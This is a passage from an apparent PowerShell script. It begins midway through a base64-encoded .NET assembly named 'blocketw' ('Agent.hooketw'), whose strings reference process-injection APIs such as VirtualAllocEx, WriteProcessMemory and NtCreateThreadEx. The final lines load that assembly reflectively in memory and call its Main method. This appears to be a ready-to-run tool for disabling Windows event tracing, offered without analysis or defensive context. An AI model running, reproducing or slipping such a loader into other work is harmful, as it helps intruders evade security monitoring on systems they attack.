9jZXNzAE50UXVlcnlJbmZvcm1hdGlvblByb2Nlc3MAR2V0Q3VycmVudFByb2Nlc3MAR2V0UHJvY0FkZHJlc3MATGRyR2V0UHJvY2VkdXJlQWRkcmVzcwBQZWJCYXNlQWRkcmVzcwBUZWJCYXNlQWRkcmVzcwBscEJhc2VBZGRyZXNzAEZ1bmN0aW9uQWRkcmVzcwBscEFkZHJlc3MAbHBTdGFydEFkZHJlc3MAU3RhY2taZXJvQml0cwBFeGl0U3RhdHVzAFdhaXRGb3JTaW5nbGVPYmplY3QAaE9iamVjdABXaW4zMlByb3RlY3QAbHBmbE9sZFByb3RlY3QAZmxQcm90ZWN0AEFsbG9jYXRpb25Qcm90ZWN0AGZsTmV3UHJvdGVjdABTZWN0aW9uT2Zmc2V0AG9wX0V4cGxpY2l0AFNpemVPZlN0YWNrQ29tbWl0AGxwRW52aXJvbm1lbnQAUHJldmlvdXNTdXNwZW5kQ291bnQAZHdBdHRyaWJ1dGVDb3VudABwYWdlUHJvdABEZWxldGVQcm9jVGhyZWFkQXR0cmlidXRlTGlzdABJbml0aWFsaXplUHJvY1RocmVhZEF0dHJpYnV0ZUxpc3QAbHBBdHRyaWJ1dGVMaXN0AGhTdGRJbnB1dABoU3RkT3V0cHV0AFN5c3RlbS5UZXh0AHdTaG93V2luZG93AGJsb2NrZXR3AEFnZW50Lmhvb2tldHcAVmlydHVhbEFsbG9jRXgATnRDcmVhdGVUaHJlYWRFeABSdGxDcmVhdGVQcm9jZXNzUGFyYW1ldGVyc0V4AFZpcnR1YWxQcm90ZWN0RXgATG9hZExpYnJhcnkAUnRsWmVyb01lbW9yeQBSZWFkUHJvY2Vzc01lbW9yeQBXcml0ZVByb2Nlc3NNZW1vcnkAbHBDdXJyZW50RGlyZWN0b3J5AFJvb3REaXJlY3RvcnkAQmFzZVByaW9yaXR5AAAAE24AdABkAGwAbAAuAGQAbABsAAAbRQB0AHcARQB2AGUAbgB0AFcAcgBpAHQAZQAAAAAADkZ4MR7Rjkm1zVKu86xh4QAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECCQcGGB0FGAkYCQQAABJVAyAAGAQAARkLCLd6XFYZNOCJBP8PHwAEAQAAAAQCAAAABAgAAAAEEAAAAAQgAAAABEAAAAAEgA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" | |
| $RAS = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($base64binary)) | |
| [Agent.hooketw.hook]::Main("") | |
| };Invoke |